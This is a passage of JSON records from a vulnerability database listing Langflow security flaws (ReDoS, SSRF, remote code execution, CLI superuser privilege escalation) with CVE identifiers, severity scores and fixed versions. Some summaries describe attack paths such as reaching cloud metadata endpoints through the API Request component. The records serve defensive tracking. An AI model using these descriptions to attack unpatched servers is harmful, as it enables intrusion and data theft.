                    "url": "https://github.com/langflow-ai/langflow/blob/main/src/backend/base/langflow/interface/utils.py#L65"
                },
                {
                    "reference_url": "https://rumbling-slice-eb0.notion.site/Remote-Redos-in-https-github-com-langflow-ai-langflow-067159ced0d5494e91b06071384969c4?pvs=4",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "2.3",
                            "scoring_system": "cvssv2",
                            "scoring_elements": "AV:A/AC:M/Au:S/C:N/I:N/A:P"
                        },
                        {
                            "value": "3.5",
                            "scoring_system": "cvssv3",
                            "scoring_elements": "CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L"
                        },
                        {
                            "value": "3.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L"
                        },
                        {
                            "value": "5.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-27T15:01:06Z/"
                        }
                    ],
                    "url": "https://rumbling-slice-eb0.notion.site/Remote-Redos-in-https-github-com-langflow-ai-langflow-067159ced0d5494e91b06071384969c4?pvs=4"
                },
                {
                    "reference_url": "https://vuldb.com/?ctiid.278659",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "2.3",
                            "scoring_system": "cvssv2",
                            "scoring_elements": "AV:A/AC:M/Au:S/C:N/I:N/A:P"
                        },
                        {
                            "value": "3.5",
                            "scoring_system": "cvssv3",
                            "scoring_elements": "CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L"
                        },
                        {
                            "value": "3.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L"
                        },
                        {
                            "value": "5.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-27T15:01:06Z/"
                        }
                    ],
                    "url": "https://vuldb.com/?ctiid.278659"
                },
                {
                    "reference_url": "https://vuldb.com/?id.278659",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "2.3",
                            "scoring_system": "cvssv2",
                            "scoring_elements": "AV:A/AC:M/Au:S/C:N/I:N/A:P"
                        },
                        {
                            "value": "3.5",
                            "scoring_system": "cvssv3",
                            "scoring_elements": "CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L"
                        },
                        {
                            "value": "3.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L"
                        },
                        {
                            "value": "5.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-27T15:01:06Z/"
                        }
                    ],
                    "url": "https://vuldb.com/?id.278659"
                },
                {
                    "reference_url": "https://vuldb.com/?submit.410043",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "2.3",
                            "scoring_system": "cvssv2",
                            "scoring_elements": "AV:A/AC:M/Au:S/C:N/I:N/A:P"
                        },
                        {
                            "value": "3.5",
                            "scoring_system": "cvssv3",
                            "scoring_elements": "CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L"
                        },
                        {
                            "value": "3.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L"
                        },
                        {
                            "value": "5.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-27T15:01:06Z/"
                        }
                    ],
                    "url": "https://vuldb.com/?submit.410043"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2024-9277",
                    "reference_id": "CVE-2024-9277",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "3.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L"
                        },
                        {
                            "value": "5.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-9277"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-355v-2rjx-fpx7",
                    "reference_id": "GHSA-355v-2rjx-fpx7",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-355v-2rjx-fpx7"
                }
            ],
            "fixed_packages": [],
            "aliases": [
                "CVE-2024-9277",
                "GHSA-355v-2rjx-fpx7"
            ],
            "risk_score": 3.1,
            "exploitability": "0.5",
            "weighted_severity": "6.2",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-9k4q-zwxf-euh1"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/49487?format=api",
            "vulnerability_id": "VCID-bb6r-1f6u-t7ed",
            "summary": "Langflow vulnerable to Server-Side Request Forgery\n**Vulnerability Overview**\n\n\nLangflow provides an API Request component that can issue arbitrary HTTP requests within a flow. This component takes a user-supplied URL, performs only normalization and basic format checks, and then sends the request using a server-side httpx client. It does not block private IP ranges (127.0.0.1, the 10/172/192 ranges) or cloud metadata endpoints (169.254.169.254), and it returns the response body as the result.\n\nBecause the flow execution endpoints (/api/v1/run, /api/v1/run/advanced) can be invoked with just an API key, if an attacker can control the API Request URL in a flow, non-blind SSRF is possible—accessing internal resources from the server’s network context. This enables requests to, and collection of responses from, internal administrative endpoints, metadata services, and internal databases/services, leading to information disclosure and providing a foothold for further attacks.\n\n**Vulnerable Code**\n\n1. When a flow runs, the API Request URL is set via user input or tweaks, or it falls back to the value stored in the node UI.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-68477",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00027",
                            "scoring_system": "epss",
                            "scoring_elements": "0.0811",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-68477"
                },
                {
                    "reference_url": "https://github.com/langflow-ai/langflow",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/langflow-ai/langflow"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68477",
                    "reference_id": "CVE-2025-68477",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68477"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-5993-7p27-66g5",
                    "reference_id": "GHSA-5993-7p27-66g5",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-5993-7p27-66g5"
                },
                {
                    "reference_url": "https://github.com/langflow-ai/langflow/security/advisories/GHSA-5993-7p27-66g5",
                    "reference_id": "GHSA-5993-7p27-66g5",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-12-19T17:23:37Z/"
                        }
                    ],
                    "url": "https://github.com/langflow-ai/langflow/security/advisories/GHSA-5993-7p27-66g5"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/48829?format=api",
                    "purl": "pkg:pypi/langflow@1.7.1",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1ynd-c2hz-53hx"
                        },
                        {
                            "vulnerability": "VCID-2195-gd33-xbdp"
                        },
                        {
                            "vulnerability": "VCID-2649-thqq-r3d2"
                        },
                        {
                            "vulnerability": "VCID-4swq-hbjm-3ucd"
                        },
                        {
                            "vulnerability": "VCID-q4r1-xjfk-7bg9"
                        },
                        {
                            "vulnerability": "VCID-rc54-gw71-gyau"
                        },
                        {
                            "vulnerability": "VCID-rrva-95s5-kbcf"
                        },
                        {
                            "vulnerability": "VCID-u8mw-7znw-rfab"
                        },
                        {
                            "vulnerability": "VCID-v5pc-pdm9-97g8"
                        },
                        {
                            "vulnerability": "VCID-ypxh-x2hy-3uhb"
                        },
                        {
                            "vulnerability": "VCID-zqwj-45w7-7kft"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/langflow@1.7.1"
                }
            ],
            "aliases": [
                "CVE-2025-68477",
                "GHSA-5993-7p27-66g5"
            ],
            "risk_score": null,
            "exploitability": null,
            "weighted_severity": null,
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-bb6r-1f6u-t7ed"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/36813?format=api",
            "vulnerability_id": "VCID-ef87-295y-zbha",
            "summary": "Langflow through 0.6.19 allows remote code execution if untrusted users are able to reach the \"POST /api/v1/custom_component\" endpoint and provide a Python script.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2024-37014",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.0596",
                            "scoring_system": "epss",
                            "scoring_elements": "0.90832",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2024-37014"
                },
                {
                    "reference_url": "https://github.com/langflow-ai/langflow",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/langflow-ai/langflow"
                },
                {
                    "reference_url": "https://github.com/langflow-ai/langflow/issues/1973",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "9.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track*",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-06-12T14:47:28Z/"
                        }
                    ],
                    "url": "https://github.com/langflow-ai/langflow/issues/1973"
                },
                {
                    "reference_url": "https://github.com/pypa/advisory-database/tree/main/vulns/langflow/PYSEC-2024-177.yaml",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/pypa/advisory-database/tree/main/vulns/langflow/PYSEC-2024-177.yaml"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2024-37014",
                    "reference_id": "CVE-2024-37014",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-37014"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-qg33-x2c5-6p44",
                    "reference_id": "GHSA-qg33-x2c5-6p44",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-qg33-x2c5-6p44"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/41729?format=api",
                    "purl": "pkg:pypi/langflow@1.0.0a3",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1dek-kvzf-27d1"
                        },
                        {
                            "vulnerability": "VCID-1ynd-c2hz-53hx"
                        },
                        {
                            "vulnerability": "VCID-2195-gd33-xbdp"
                        },
                        {
                            "vulnerability": "VCID-2649-thqq-r3d2"
                        },
                        {
                            "vulnerability": "VCID-9k4q-zwxf-euh1"
                        },
                        {
                            "vulnerability": "VCID-bb6r-1f6u-t7ed"
                        },
                        {
                            "vulnerability": "VCID-ef87-295y-zbha"
                        },
                        {
                            "vulnerability": "VCID-fc5h-qc2t-xqc3"
                        },
                        {
                            "vulnerability": "VCID-jt18-vv56-2fgx"
                        },
                        {
                            "vulnerability": "VCID-ncvf-vzqr-uydz"
                        },
                        {
                            "vulnerability": "VCID-q4r1-xjfk-7bg9"
                        },
                        {
                            "vulnerability": "VCID-qwtw-q92t-quhz"
                        },
                        {
                            "vulnerability": "VCID-rc54-gw71-gyau"
                        },
                        {
                            "vulnerability": "VCID-s17d-sfjq-z7eg"
                        },
                        {
                            "vulnerability": "VCID-sbea-kkfu-akgb"
                        },
                        {
                            "vulnerability": "VCID-u8mw-7znw-rfab"
                        },
                        {
                            "vulnerability": "VCID-v5pc-pdm9-97g8"
                        },
                        {
                            "vulnerability": "VCID-wv26-29b9-vqgg"
                        },
                        {
                            "vulnerability": "VCID-ypxh-x2hy-3uhb"
                        },
                        {
                            "vulnerability": "VCID-ysnc-jyxb-6qcy"
                        },
                        {
                            "vulnerability": "VCID-zqwj-45w7-7kft"
                        },
                        {
                            "vulnerability": "VCID-ztx2-wefa-c7bk"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/langflow@1.0.0a3"
                },
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/44818?format=api",
                    "purl": "pkg:pypi/langflow@1.0.15",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1dek-kvzf-27d1"
                        },
                        {
                            "vulnerability": "VCID-1ynd-c2hz-53hx"
                        },
                        {
                            "vulnerability": "VCID-2195-gd33-xbdp"
                        },
                        {
                            "vulnerability": "VCID-2649-thqq-r3d2"
                        },
                        {
                            "vulnerability": "VCID-4swq-hbjm-3ucd"
                        },
                        {
                            "vulnerability": "VCID-9k4q-zwxf-euh1"
                        },
                        {
                            "vulnerability": "VCID-bb6r-1f6u-t7ed"
                        },
                        {
                            "vulnerability": "VCID-fc5h-qc2t-xqc3"
                        },
                        {
                            "vulnerability": "VCID-jt18-vv56-2fgx"
                        },
                        {
                            "vulnerability": "VCID-ncvf-vzqr-uydz"
                        },
                        {
                            "vulnerability": "VCID-q4r1-xjfk-7bg9"
                        },
                        {
                            "vulnerability": "VCID-qwtw-q92t-quhz"
                        },
                        {
                            "vulnerability": "VCID-rc54-gw71-gyau"
                        },
                        {
                            "vulnerability": "VCID-sbea-kkfu-akgb"
                        },
                        {
                            "vulnerability": "VCID-u8mw-7znw-rfab"
                        },
                        {
                            "vulnerability": "VCID-v5pc-pdm9-97g8"
                        },
                        {
                            "vulnerability": "VCID-wv26-29b9-vqgg"
                        },
                        {
                            "vulnerability": "VCID-ypxh-x2hy-3uhb"
                        },
                        {
                            "vulnerability": "VCID-ysnc-jyxb-6qcy"
                        },
                        {
                            "vulnerability": "VCID-zqwj-45w7-7kft"
                        },
                        {
                            "vulnerability": "VCID-ztx2-wefa-c7bk"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/langflow@1.0.15"
                }
            ],
            "aliases": [
                "CVE-2024-37014",
                "GHSA-qg33-x2c5-6p44",
                "PYSEC-2024-177"
            ],
            "risk_score": 4.4,
            "exploitability": "0.5",
            "weighted_severity": "8.8",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-ef87-295y-zbha"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/57968?format=api",
            "vulnerability_id": "VCID-fc5h-qc2t-xqc3",
            "summary": "Langflow Vulnerable to Privilege Escalation via CLI Superuser Creation (Post-RCE)\nA privilege escalation vulnerability exists in Langflow containers where an authenticated user with RCE access can invoke the internal CLI command **langflow superuser** to create a new administrative user. This results in full superuser access, even if the user initially registered through the UI as a regular (non-admin) account.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-57760",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00017",
                            "scoring_system": "epss",
                            "scoring_elements": "0.04413",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-57760"
                },
                {
                    "reference_url": "https://github.com/langflow-ai/langflow",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/langflow-ai/langflow"
                },
                {
                    "reference_url": "https://github.com/langflow-ai/langflow/commit/c188ec113c9ca46154ad01d0eded1754cc6bef97",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track*",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2025-08-25T20:34:06Z/"
                        }
                    ],
                    "url": "https://github.com/langflow-ai/langflow/commit/c188ec113c9ca46154ad01d0eded1754cc6bef97"
                },
                {
                    "reference_url": "https://github.com/langflow-ai/langflow/pull/9152",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/langflow-ai/langflow/pull/9152"
                },
                {
                    "reference_url": "http://github.com/langflow-ai/langflow/pull/9152",
                    "reference_id": "9152",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "Track*",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2025-08-25T20:34:06Z/"
                        }
                    ],
                    "url": "http://github.com/langflow-ai/langflow/pull/9152"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-57760",
                    "reference_id": "CVE-2025-57760",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-57760"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-4gv9-mp8m-592r",
                    "reference_id": "GHSA-4gv9-mp8m-592r",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://github.com/advisories/GHSA-4gv9-mp8m-592r"
                },
                {
                    "reference_url": "https://github.com/langflow-ai/langflow/security/advisories/GHSA-4gv9-mp8m-592r",
                    "reference_id": "GHSA-4gv9-mp8m-592r",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track*",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2025-08-25T20:34:06Z/"
                        }
                    ],
                    "url": "https://github.com/langflow-ai/langflow/security/advisories/GHSA-4gv9-mp8m-592r"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/46615?format=api",
                    "purl": "pkg:pypi/langflow@1.5.1",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1ynd-c2hz-53hx"
                        },
                        {
                            "vulnerability": "VCID-2195-gd33-xbdp"
                        },
                        {
                            "vulnerability": "VCID-2649-thqq-r3d2"
                        },
                        {
                            "vulnerability": "VCID-4swq-hbjm-3ucd"
                        },
                        {
                            "vulnerability": "VCID-bb6r-1f6u-t7ed"
                        },
                        {
                            "vulnerability": "VCID-ncvf-vzqr-uydz"
                        },
                        {
                            "vulnerability": "VCID-q4r1-xjfk-7bg9"
                        },
                        {
                            "vulnerability": "VCID-qwtw-q92t-quhz"
                        },
                        {
                            "vulnerability": "VCID-rc54-gw71-gyau"
                        },
                        {
                            "vulnerability": "VCID-rrva-95s5-kbcf"
                        },
                        {
                            "vulnerability": "VCID-sbea-kkfu-akgb"
                        },
                        {
                            "vulnerability": "VCID-u8mw-7znw-rfab"
                        },
                        {
                            "vulnerability": "VCID-v5pc-pdm9-97g8"
                        },
                        {
                            "vulnerability": "VCID-ypxh-x2hy-3uhb"
                        },
                        {
                            "vulnerability": "VCID-ysnc-jyxb-6qcy"
                        },
                        {
                            "vulnerability": "VCID-zqwj-45w7-7kft"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/langflow@1.5.1"
                }
            ],
            "aliases": [
                "CVE-2025-57760",
                "GHSA-4gv9-mp8m-592r"
            ],
            "risk_score": null,
            "exploitability": null,
            "weighted_severity": null,
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-fc5h-qc2t-xqc3"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/56121?format=api",
            "vulnerability_id": "VCID-jt18-vv56-2fgx",
            "summary": "Langflow vulnerable to remote code execution\nlangflow <=1.0.18 is vulnerable to Remote Code Execution (RCE) as any component provided the code functionality and the components run on the local machine rather than in a sandbox.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2024-48061",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.132",
                            "scoring_system": "epss",
                            "scoring_elements": "0.94274",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2024-48061"
                },
                {
                    "reference_url": "https://gist.github.com/AfterSnows/1e58257867002462923fd62dde2b5d61",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H/E:P"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track*",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2024-11-06T19:16:58Z/"
                        }
                    ],
                    "url": "https://gist.github.com/AfterSnows/1e58257867002462923fd62dde2b5d61"
                },
                {
                    "reference_url": "https://github.com/langflow-ai/langflow",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H/E:P"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/langflow-ai/langflow"
                },
                {
                    "reference_url": "https://github.com/langflow-ai/langflow/issues/696",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H/E:P"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/langflow-ai/langflow/issues/696"
                },
                {
                    "reference_url": "https://rumbling-slice-eb0.notion.site/There-is-a-Remote-Code-Execution-RCE-vulnerability-in-the-repository-https-github-com-langflow-a-105e3cda9e8c800fac92f1b571bd40d8",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H/E:P"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track*",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2024-11-06T19:16:58Z/"
                        }
                    ],
                    "url": "https://rumbling-slice-eb0.notion.site/There-is-a-Remote-Code-Execution-RCE-vulnerability-in-the-repository-https-github-com-langflow-a-105e3cda9e8c800fac92f1b571bd40d8"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2024-48061",
                    "reference_id": "CVE-2024-48061",
                    "reference_type": "",
                    "scores": [
